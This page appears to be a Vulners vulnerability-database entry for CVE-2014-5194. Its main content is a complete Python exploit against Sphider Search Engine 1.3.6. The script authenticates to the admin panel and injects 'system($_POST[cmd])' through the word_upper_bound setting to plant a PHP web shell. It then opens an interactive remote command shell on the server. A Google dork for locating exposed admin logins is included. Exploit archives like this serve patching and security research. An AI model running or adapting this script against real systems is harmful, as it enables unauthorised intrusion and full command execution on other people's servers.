Vulners
Lucene search
Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | CVE-2014-5194 | 28 Jul 201400:00 | – | circl |
 | CVE-2014-5194 | 7 Aug 201410:00 | – | cve |
 | CVE-2014-5194 | 7 Aug 201410:00 | – | cvelist |
 | EUVD-2014-5092 | 7 Oct 202500:30 | – | euvd |
 | CVE-2014-5194 | 7 Aug 201411:13 | – | nvd |
 | Sphider Search Engine 1.3.6 Remote Code Execution | 27 Oct 202000:00 | – | packetstorm |
 | Code injection | 7 Aug 201411:13 | – | prion |
# Exploit Title: Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)
# Google Dork: intitle:"Sphider Admin Login"
# Date: 2014-07-28
# Exploit Author: Gurkirat Singh
# Vendor Homepage: http://www.sphider.eu/
# Software Link: http://www.sphider.eu/sphider-1.3.6.zip
# Version: v1.3.6
# Tested on: Windows and Linux
# CVE : CVE-2014-5194
# Proof of Concept: https://www.exploit-db.com/exploits/34189
from argparse import ArgumentParser, RawTextHelpFormatter
from huepy import *
import string
import random
from bs4 import BeautifulSoup, Tag
from requests import Session
from randua import generate as randua
_F = "".join(random.choices(string.ascii_letters, k=13))
parser = ArgumentParser(description="Exploit for CVE-2014-5194",
formatter_class=RawTextHelpFormatter)
parser.add_argument("--target",
"-t",
help="target uri where application is installed",
required=True,
metavar="",
dest="t")
parser.add_argument("--user",
"-u",
help="username to authenticate",
required=True,
metavar="",
dest="u")
parser.add_argument("--password",
"-p",
help="password to authenticate",
required=True,
metavar="",
dest="p")
parser.add_argument("--debug",
help="if passed, spawn the firefox window",
default=True,
action="store_false")
parser.add_argument("--timeout",
help="timeout in seconds (default: 1)",
dest="T",
metavar="",
default=1)
args = parser.parse_args()
if args.t.endswith("/"):
args.t = args.t[:-1]
print(run("Logging in"))
with Session() as http:
data = {"user": args.u, "pass": args.p}
headers = {"User-Agent": randua()}
http.post(args.t + '/admin/auth.php',
data=data,
headers=headers,
allow_redirects=False)
r = http.get(args.t + '/admin/admin.php',
headers=headers,
allow_redirects=False)
html = BeautifulSoup(r.content.decode(), "lxml")
title: Tag = html.find("title")
if title.text == "Sphider Admin Login":
print(bad("Failed to login"))
exit(1)
else:
print(good("Logged in"))
payload = {
'f': 'settings',
'Submit': '1',
'_version_nr': '1.3.5',
'_language': 'en',
'_template': 'standard',
'_admin_email': 'admin@localhost',
'_print_results': '1',
'_tmp_dir': 'tmp',
'_log_dir': 'log',
'_log_format': 'html',
'_min_words_per_page': '10',
'_min_word_length': '3',
'_word_upper_bound': '100;system($_POST[cmd])',
'_index_numbers': '1',
'_index_meta_keywords': '1',
'_pdftotext_path': 'c:\\temp\\pdftotext.exe',
'_catdoc_path': 'c:\\temp\\catdoc.exe',
'_xls2csv_path': 'c:\\temp\\xls2csv',
'_catppt_path': 'c:\\temp\\catppt',
'_user_agent': 'Sphider',
'_min_delay': '0',
'_strip_sessids': '1',
'_results_per_page': '10',
'_cat_columns': '2',
'_bound_search_result': '0',
'_length_of_link_desc': '0',
'_links_to_next': '9',
'_show_meta_description': '1',
'_show_query_scores': '1',
'_show_categories': '1',
'_desc_length': '250',
'_did_you_mean_enabled': '1',
'_suggest_enabled': '1',
'_suggest_history': '1',
'_suggest_rows': '10',
'_title_weight': '20',
'_domain_weight': '60',
'_path_weight': '10',
'_meta_weight': '5'
}
print(run("Exploiting"))
http.post(args.t + "/admin/admin.php", data=payload)
r = http.post(args.t + "/settings/conf.php", data={"cmd": "echo %s" % _F})
if r.content.decode().strip() != _F:
print(bad("Failed"))
exit(1)
print(good("Exploited"))
print(info("Spawning Shell"))
user = http.post(args.t + "/settings/conf.php", data={"cmd": "whoami"})
host = http.post(args.t + "/settings/conf.php",
data={"cmd": "cat /etc/hostname"})
shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}"
while True:
try:
cmd = input(shell)
if cmd == "exit": break
r = http.post(args.t + "/settings/conf.php", data={"cmd": cmd})
print(r.content.decode().strip())
except:
break
print()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Oct 2020 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 26.5
EPSS0.02262